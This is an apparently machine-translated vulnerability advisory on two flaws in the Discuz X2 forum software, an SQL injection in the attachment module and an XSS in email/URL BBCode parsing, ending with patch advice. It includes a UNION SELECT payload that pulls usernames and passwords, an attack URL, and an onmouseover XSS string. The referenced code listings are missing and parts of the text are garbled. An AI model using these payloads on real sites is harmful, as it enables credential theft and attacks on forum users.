Discuz X2 security research report: 0-day analysis of SQL and XSS Injection Vulnerabilities (Nevel Security Team)

Recently, DiscuzX2 was revealed to have two 0day vulnerabilities, one being the SQL injection vulnerability. Attackers can exploit this vulnerability to obtain the user name and password, and the other being the XSS injection vulnerability, attackers can conduct website Trojans, phishing, and other activities. Currently, the official version 0629 has been released for this issue, the following is the vulnerability analysis report of the Nevel security team imiyoo on the 0day of disucz X2.

SQL Injection Problem description:

SQL is a type of database attack. Attackers use malformed client input. If the filter is not enough, the program will execute too many database commands, resulting in data leakage, A series of problems such as server intrusion; High level of harm.

Analysis Report:

The specific cause of the problem occurs in source/module/forum/forum_attachment.php. The Code is as follows:

$ _ G ['gp _ aid '] is generated by the user-submitted variable aid, and the program passes the aid through base64_decode before passing in the SQL query, no judgment was made before being passed in to the SQL query. However, base64 encryption is provided to attackers to bypass the SQL attack detection program of Discuz, thus generating the SQL injection vulnerability.

Construct SQL _Exploit:

Mod = attachment // contains the vulnerability File Findpost = imiyoo // ensure that $ _ G ['gp _ findpost'] is not empty, so that the program enters the malicious SQL Query Process Aid = base64_encode ("1 and 1 = 2 union all select 1, concat (username, 0x7C, password) from pre_common_member where username like admin | Nevel ") //

Construct an SQL statement to expose the user name and password. Four '|' are followed by the statement to generate five variables.

The complete attack statement is as follows:

Http://www.bkjia.com/forum.php? Mod = attachment & findpost = imiyoo & aid = attachment

Attack effects include:

XSS Problem description:

XSS is a client-side attack. Attackers can insert malicious html code into a Web page. When a user browses this page, the html code embedded in the Web is executed, in this way, users can be maliciously attacked for special purposes. With this XSS vulnerability, attackers can launch 1 Website Trojan, 2 website phishing, and 3 CSRF attacks. The attack severity is moderate.

Analysis Report:

The specific cause occurs in source/function/function_discuzcode.php. In the discuzcode function, we can see that the programmer directly replaces the [emai] [/email] information entered by the user using the preg_replace function, however, there is a problem in this function. When the variables submitted by the user contain special characters such as double quotation marks, the function will escape them and then output them, the program author has passed the parseemail function without filtering it;

The parseemail function is as follows:

The $ text variable is directly output to the client without filtering, resulting in an XSS vulnerability.

Construct Xss_Exploit as follows:

[Email] [url] "http://www.imiyoo.com onmouseover = alert (/Discuz-XSS-Exploit/);" [/url] [/email]

Vulnerability repair:

When the above malicious data is input and converted by the preg_replace function, double quotation marks indicate the actual meaning of the string to be escaped and output as part of the string, resulting in XSS attacks, for example:

Therefore, we need to convert the variable converted by preg_replace and filter the Escape Character.

Security suggestion: manually install the latest official versionHttp://www.discuz.net/thread-2168918-1-1.html

Source: Nevel security team Author: IMIYOO